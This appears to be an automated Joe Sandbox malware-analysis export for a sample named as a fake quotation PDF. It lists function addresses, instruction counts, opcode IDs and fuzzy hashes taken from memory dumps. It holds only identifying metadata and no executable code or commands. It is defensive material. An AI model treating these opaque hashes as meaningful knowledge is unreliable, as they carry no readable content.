Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddcdd9411310973672dbb185158f4556d59c85bd4a73521f6978a509faecb23c
Instruction ID: b574e17d5982107c5d0642a472063a468e044188ae8e5bf6c3dc74388b9d3525
Opcode Fuzzy Hash: ddcdd9411310973672dbb185158f4556d59c85bd4a73521f6978a509faecb23c
Instruction Fuzzy Hash: 2001DA3491494D8FDF84EF58C849AEE7BF1FB28305F00056AE41DD3250DB74A590CB90

Function 00007FF7C10707B3 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb2d44128bd7d438e76fe9426201db4cb1a5e2b23bc13944bdfda49c9691485
Instruction ID: 23563a41c7c5b6ae458a7a4d6c529f3b5b9ca9688a4d8278f4f28cb8a9503c53
Opcode Fuzzy Hash: 0eb2d44128bd7d438e76fe9426201db4cb1a5e2b23bc13944bdfda49c9691485
Instruction Fuzzy Hash: B0011A3180865D9FDF84EF58C854AFA7BF0FF28305F50056AE81DD7291DA74AA94CB90

Function 00007FF7C129E239 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 725e3de12db7848cbe60d32bbc0184114ee33792f92314bc79e65d448a85dc27
Instruction ID: 318b3770598d5a3ee15a28275b5ee59f1c4ff94027a2fe4658537efcc41cfd6f
Opcode Fuzzy Hash: 725e3de12db7848cbe60d32bbc0184114ee33792f92314bc79e65d448a85dc27
Instruction Fuzzy Hash: 2D016930D0D68D8FDB85EF18C8556ADBBF0FF69300F4400AAD408C72A2DB75A954CB90

Function 00007FF7C12A72A0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b1afa8e9ee79d802cef5fe59e4abda1b7620eb104db643333b1462d24d703cc
Instruction ID: 2ec62d01ca5a0e8cc10fcaae0d262a958cf6e715060dae133613e8e56ea2e222
Opcode Fuzzy Hash: 8b1afa8e9ee79d802cef5fe59e4abda1b7620eb104db643333b1462d24d703cc
Instruction Fuzzy Hash: 6201D630918A4D8FDF84EF68C849AEE7BF1FB68305F10056AE81DD3260DB71A594CB80

Function 00007FF7C120314D Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928152559.00007FF7C1200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1200000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48c42b817c8a59ea0273b950c13b017cbe727f34661014222ac8be4108caead0
Instruction ID: 803d8d39d1ea6eb7da3d7477b3b011f171021e24f1842feb8b8c4764f160f7e0
Opcode Fuzzy Hash: 48c42b817c8a59ea0273b950c13b017cbe727f34661014222ac8be4108caead0
Instruction Fuzzy Hash: F5011B74E0451A8FEF94EF68C4857ADB7B1FF58310F908175C00DE2291CB3869858BA0

Function 00007FF7C1289A28 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c724d5e946bbfc232e0894f877495b8de2aef2344510a8f97c0c3e3e22253662
Instruction ID: ee8710069245aeb580190747af5ee8aa126d1ab9743fe140fea7ff6319d9807d
Opcode Fuzzy Hash: c724d5e946bbfc232e0894f877495b8de2aef2344510a8f97c0c3e3e22253662
Instruction Fuzzy Hash: 0BF05411F28D4D0BABA8FA6D59859B6A1D1DFD8330790467A900FC369BDC6CF845C340

Function 00007FF7C129D9A0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48240147650e44ce579ea0cf57bcf029d29abaacd0ab407972078bff8f068323
Instruction ID: ff90035195d7f3f055d91c84031ce4ea436fa60f8ea277f4e73db952a078c686
Opcode Fuzzy Hash: 48240147650e44ce579ea0cf57bcf029d29abaacd0ab407972078bff8f068323
Instruction Fuzzy Hash: 6B01A47091891D8FDF84EF68C848AAABBF1FB68305F50456AA41DD3290DB71A590CB80

Function 00007FF7C1060A5D Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae11bad0c926393085e10997989fab2dd28b8fbda31b7154cdcbf8f2534d76f2
Instruction ID: 397d5f26aa1727f145f6b65158cd4e1455faf26153e9e288f63d60a3282b74c4
Opcode Fuzzy Hash: ae11bad0c926393085e10997989fab2dd28b8fbda31b7154cdcbf8f2534d76f2
Instruction Fuzzy Hash: 60F082719CF6C11FDB0667302C168E5BFA45E0322174F46FBD098DB9A3D48D6696C3A2

Function 00007FF7C12815BE Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c060584cd46d66466058f24f50de430d23200722d5a9247c3c24d10f8ac4162c
Instruction ID: dcd3207f2605ea1fdf8a61bbe4f20530f51f7facc803fd1786ebe0d398770ddb
Opcode Fuzzy Hash: c060584cd46d66466058f24f50de430d23200722d5a9247c3c24d10f8ac4162c
Instruction Fuzzy Hash: 42F0E03191854D5FDB44FB98D859BE9FBA4FF49334F440139E00EE2182C9287451C754

Function 00007FF7C1062918 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eb7444368eac9444fa6f9c9614ac6834e1f53f902c4704d943cfd7e0214a423
Instruction ID: 6cbf0bbe813d442e2a1d3daaee8441e904b657ca4a1e9a06a03c012077f58ad6
Opcode Fuzzy Hash: 7eb7444368eac9444fa6f9c9614ac6834e1f53f902c4704d943cfd7e0214a423
Instruction Fuzzy Hash: CFF0AE31B0C4054BE3287A1898597BA73C5DB99770F650736E80EC32C5ECD4584141A5

Function 00007FF7C1065C72 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3b835865f380a87ca6f91b16116849e9e940e50ba53350334d4238d19bba66e
Instruction ID: 8bb5223053c3cc731c34d6e36fdb6153586a1446d748830b7e2209fe3a371b21
Opcode Fuzzy Hash: e3b835865f380a87ca6f91b16116849e9e940e50ba53350334d4238d19bba66e
Instruction Fuzzy Hash: B1F0FC15E0DA4ECFE771BD004805160BB91DF893B174A01F4CC48C6D8AD99C99CB43B0

Function 00007FF7C1064413 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ddb69bc7033e379c3e2a363fd67a3966a25103819e3a161f5bc4a692cbc3270
Instruction ID: cb6c3585c14063591caaa476921642131d50139852b19319c77358dd8628aeea
Opcode Fuzzy Hash: 9ddb69bc7033e379c3e2a363fd67a3966a25103819e3a161f5bc4a692cbc3270
Instruction Fuzzy Hash: 19F0E532B4C40A06E7187A08B8810F9F381D792331BE2423BC817C56C0ED9BA4C24150

Function 00007FF7C1282320 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bc4cb39174494a6e6d3d82f9c2097f429519c505f0af174e9e3e0e86a24db6f
Instruction ID: 993eb32eab419dc75f51be44f3500891c1ddbc3020355d09093846e7f9bb0aba
Opcode Fuzzy Hash: 9bc4cb39174494a6e6d3d82f9c2097f429519c505f0af174e9e3e0e86a24db6f
Instruction Fuzzy Hash: 6AF0F631A0CA084BF745FF1890093BDB6D2DF98364F844A3AD44DC11A1DEA89A80C796

Function 00007FF7C129A451 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61c3451f0536dbf4351fd0383273f89f5ed2f658005b87109751d6ce787f78bc
Instruction ID: c684c6f5adb8169f581c3871006d47afd9fc369e36c8b5d6838de4240c723e6f
Opcode Fuzzy Hash: 61c3451f0536dbf4351fd0383273f89f5ed2f658005b87109751d6ce787f78bc
Instruction Fuzzy Hash: A3E06831B5CA420BD75A333C28151E5BB94FF41331F4501B6D408C65C2C88CA9A1C3B2

Function 00007FF7C12A0095 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00da996a932a818436e82ccb4c1bccb40132ad0178a2f79b3c006934bb9bd19c
Instruction ID: 795e0db7b51eb651a5260b8768b6821bf846f314cf183348e83433b0c60db6b9
Opcode Fuzzy Hash: 00da996a932a818436e82ccb4c1bccb40132ad0178a2f79b3c006934bb9bd19c
Instruction Fuzzy Hash: 45017134A082598FDB64DF14C854BE8B7B1FB46314F5082EAC449A72D1DBB86AC5CF80

Function 00007FF7C106AD10 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621b3cc276a7486a7a44d1d6fef3ec3de245e7350bc8edeb3c95305741dca4ec
Instruction ID: f74e5903a2438b37561a9c7fd7e0cbabb4327bdf551742eeb2852e625fd07f70
Opcode Fuzzy Hash: 621b3cc276a7486a7a44d1d6fef3ec3de245e7350bc8edeb3c95305741dca4ec
Instruction Fuzzy Hash: 5EF03A30C58A0E9FEB84FF68984A6EDBBA0FF18315F410536E80DC2291CA74A5908B91

Function 00007FF7C1064DE0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f30c4be809158f01336cc3aded8ac076e1e227adc006aab6fa130e9942902305
Instruction ID: 1eecd257d1c6d7a2257efa8835d8235269480daa3702c29745fbb0b48d252ba9
Opcode Fuzzy Hash: f30c4be809158f01336cc3aded8ac076e1e227adc006aab6fa130e9942902305
Instruction Fuzzy Hash: C7F0E230F19A028BD358FE18C891479B3D2FFE5721BA19538E847C3780DE74F8528681

Function 00007FF7C1064AFB Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e069fa41a88883aad5e2d2b6d5dd961f69b8c6c8d3274f46de6e9833699a0c9
Instruction ID: ee19b01d915440af7a4b70e51a919524f286e72a6b69e9232b63dee791f1bc9a
Opcode Fuzzy Hash: 5e069fa41a88883aad5e2d2b6d5dd961f69b8c6c8d3274f46de6e9833699a0c9
Instruction Fuzzy Hash: 12E0653170CE084FE794EE1CE881669F3D0FB84320F10093ED55DC3114D625E4818B42

Function 00007FF7C1280ED0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 337a004ea4be4a97a9540af6444a009b3f71d0250895afa71bf48873f2b4eff8
Instruction ID: cfa768ff3025b439782605e0ffda1c84ede7dbccb1e8e31ccf1e72c662c6fd79
Opcode Fuzzy Hash: 337a004ea4be4a97a9540af6444a009b3f71d0250895afa71bf48873f2b4eff8
Instruction Fuzzy Hash: 4DE01225F24B5A07F7A8B57E64491F2A2C1DB44330F44447AA849C1594F89DACC15781

Function 00007FF7C1290F0C Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0f4ccb0392c70fba0f7ef371963ee4c8f5d0f3bd7cb045e3d5cb4775b9db8ad
Instruction ID: d4b701627f9d3ca5bddb54b6783086e121b3ddedf87725fc07e535412169d448
Opcode Fuzzy Hash: e0f4ccb0392c70fba0f7ef371963ee4c8f5d0f3bd7cb045e3d5cb4775b9db8ad
Instruction Fuzzy Hash: 81E0867A74C6060EE3082A2D78071F4FBC0EB8A270B80413BD88AC1D53ED27749342D5

Function 00007FF7C1065CCF Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17929b890803279d0d1f772315b8232b0fc60114b2f67f654e3da0f3c3aece30
Instruction ID: 6562399f47580aeb760a19e99ab29f368b86faed5cde49aa972114a9f67ebacd
Opcode Fuzzy Hash: 17929b890803279d0d1f772315b8232b0fc60114b2f67f654e3da0f3c3aece30
Instruction Fuzzy Hash: 7FF03035A08A098FDFA9EE0CC844A94B7F1FFA9311B0501E5D40CD7696DA74EDC5CB90

Function 00007FF7C10630AA Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64741a743517b690bf8256d5c102822769490e16cb838ade7a9d7db4a1e70b53
Instruction ID: 241f5339504fb333756cf2f230643b57a523afedf504a6cfdf356bec127a32c3
Opcode Fuzzy Hash: 64741a743517b690bf8256d5c102822769490e16cb838ade7a9d7db4a1e70b53
Instruction Fuzzy Hash: 3CF0893060C6869FF759EF1488302B8B761FF55320F5442BEE84BC66C3DD546495C791

Function 00007FF7C10622A7 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7daf927f9bcbaf4f144582ae81fd01fe81b2d853714e202eeadc26e498caafc0
Instruction ID: a260217729dbd348e71f6d93ba2c7cdd9e7a084b8f00d9755fbdb226385c4b6f
Opcode Fuzzy Hash: 7daf927f9bcbaf4f144582ae81fd01fe81b2d853714e202eeadc26e498caafc0
Instruction Fuzzy Hash: DEE0BF3470981ACFDB50EB4CD494A9D73E2FB98321B164265D409CB3A9DEB8ED85CB90

Function 00007FF7C1064ECF Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3601198622baa0a47447066b16c382720a76ed141f4d632906514590888c1192
Instruction ID: 641bf10eaae75f5bd466bf84dbdb01ed5725466f90b5f220798ff0a20ff30f2c
Opcode Fuzzy Hash: 3601198622baa0a47447066b16c382720a76ed141f4d632906514590888c1192
Instruction Fuzzy Hash: 02E0863070C5018BE718FA24C855A75B353E7D1331B518B39C41BC72D5DD79E5A2C780

Function 00007FF7C129E6F9 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87bae10e54d0d0c98a6833d204488342e885b893f2067a06309bee6c0e10241e
Instruction ID: 93d5649e09bece27b6c693cd4f29c5e7af8da38434123a983f9114e30f2b8506
Opcode Fuzzy Hash: 87bae10e54d0d0c98a6833d204488342e885b893f2067a06309bee6c0e10241e
Instruction Fuzzy Hash: FCF0D470908A598FDB55DF28C8103D9FBB1BF46300F5482EA840DE6682CB3469848F90

Function 00007FF7C1063053 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff2ebc946e260d9b437f09579269165a8fd363eb8c25bfb85626941724932fb
Instruction ID: 005d440450a5684dabf64c05eddff2286ac3aea2250c76f7ca387ef727b2ca34
Opcode Fuzzy Hash: aff2ebc946e260d9b437f09579269165a8fd363eb8c25bfb85626941724932fb
Instruction Fuzzy Hash: 67E08C313086468BE325FF24D8906E673A5EFA1321F650A3ADC06C72E0DE68E5C0CB20

Function 00007FF7C106241F Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c7285ac4e8ce8346ef21a0aa1e43e7be88a1c3b28937034dd8f98526f4814a
Instruction ID: fce3087f100a22d15a2b5cf71184f107ced8e852a1f945e1dc4d75537c62033b
Opcode Fuzzy Hash: f3c7285ac4e8ce8346ef21a0aa1e43e7be88a1c3b28937034dd8f98526f4814a
Instruction Fuzzy Hash: 94E0E631B4840E8BFB94FE50C454DECB391EB60320F954675C905D71E5DEACE9C14B50

Function 00007FF7C1061EAD Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f927d87ec3bc04b011ade403882273db1b2741c289212860719fb67a1c5489
Instruction ID: f317aa907c6bf90a9d26ab1e6cdde5b0b99d9f041a9354659aed37d495011cde
Opcode Fuzzy Hash: 03f927d87ec3bc04b011ade403882273db1b2741c289212860719fb67a1c5489
Instruction Fuzzy Hash: FEC04C7378D6190D754C244C7C030F8B3C0C683171540167FD98B41957A84B2467008D

Function 00007FF7C1061822 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a4ea39a1b8ecac9e985dcaad35c4d2e3edbd6eb249b133e120439bc900e1678
Instruction ID: 4eff48085f2baba07b83d335f13e99dffdb49cc30e5cadfcf830e00c193220ea
Opcode Fuzzy Hash: 3a4ea39a1b8ecac9e985dcaad35c4d2e3edbd6eb249b133e120439bc900e1678
Instruction Fuzzy Hash: 60D05E21E0964D5FCF41E768D8105EDBB71EFCA210B5400B2E40CE3186C92868548350

Function 00007FF7C12866CA Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12ce5c97a658b90e5b2331b21af688a493e1cf99e3c874faf01510f2a89391d1
Instruction ID: ad8b66a8bb72a3c133e1434c2052c8c9cf8a8ba36d1ea61f9a0120b934ced9de
Opcode Fuzzy Hash: 12ce5c97a658b90e5b2331b21af688a493e1cf99e3c874faf01510f2a89391d1
Instruction Fuzzy Hash: B2D0A734854A4C8FCB40FF54D401499B360FB4C304F400665EC1CC3241D735A6A1CB46

Function 00007FF7C1060C26 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eb3eb3460e2eb56b6bcab78020eed834e5c683bb2cb57a2f3e2c1a4a6b5aa2b
Instruction ID: b9ed8d6f7f6c97c1e1fe048a86c15956205df6f8fcaa510434060c6a888c6c42
Opcode Fuzzy Hash: 1eb3eb3460e2eb56b6bcab78020eed834e5c683bb2cb57a2f3e2c1a4a6b5aa2b
Instruction Fuzzy Hash: D4D0A961208A0A4ADB80BF9CA0083C9BB00FF542B9F8006B6C809A1286CE20A2A24295

Function 00007FF7C1060DE4 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07d1b0bb25f9bce42c4d31356326a7cf7310b9060812236a9abd92268d8ebef
Instruction ID: f229fe2d8cb8bc2778915983ef9a93cfbaeffeaaf3431f9cf4b8073d149df87e
Opcode Fuzzy Hash: b07d1b0bb25f9bce42c4d31356326a7cf7310b9060812236a9abd92268d8ebef
Instruction Fuzzy Hash: 11A02233EC803EC08F20A8C03C000FEF320EB80330FCA0033CB2E820008AA2A03082C0

Function 00007FF7C12822ED Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c4d158f1f869b59391f1cdaada16997b35d600f58eb54533a87396dbc9932b7
Instruction ID: 860ec126ae190d8eab017facd69620ac316c778722f9ab33620d98886d9548fd
Opcode Fuzzy Hash: 9c4d158f1f869b59391f1cdaada16997b35d600f58eb54533a87396dbc9932b7
Instruction Fuzzy Hash: 0D90028150C652255A1436A9B9021D903405B413A4B045177D408581870C1838425495

Non-executed Functions

Function 00007FF7C1280188 Relevance: 1.6, Strings: 1, Instructions: 339COMMON

Download Yara Rule

Strings

w*_H, xrefs: 00007FF7C128AD74

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID: w*_H
API String ID: 0-2807172150
Opcode ID: 27f5ea0ea35ef38b91099459563a92093f23668d7d571d41e94fe98561e1dac2
Instruction ID: fbb36e330d9a98296e2f379ac74a8cac3244ec4ed8adbde41f408a90992ec22c
Opcode Fuzzy Hash: 27f5ea0ea35ef38b91099459563a92093f23668d7d571d41e94fe98561e1dac2
Instruction Fuzzy Hash: 3FA1E431B08E4A4FE795AB3C94552B5B7E1FF9936074442BAD04EC7693EE28B842C781

Function 00007FF7C1289978 Relevance: .9, Instructions: 932COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1928650413.00007FF7C1280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1280000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8a897d98370c36b2fe02a990a058cfa1fb3ff745466edd74b6cec814a99fdf2
Instruction ID: 497894d9c348787441ab47607497e10a0e7864c4d11e8cbe21822c7803517b65
Opcode Fuzzy Hash: a8a897d98370c36b2fe02a990a058cfa1fb3ff745466edd74b6cec814a99fdf2
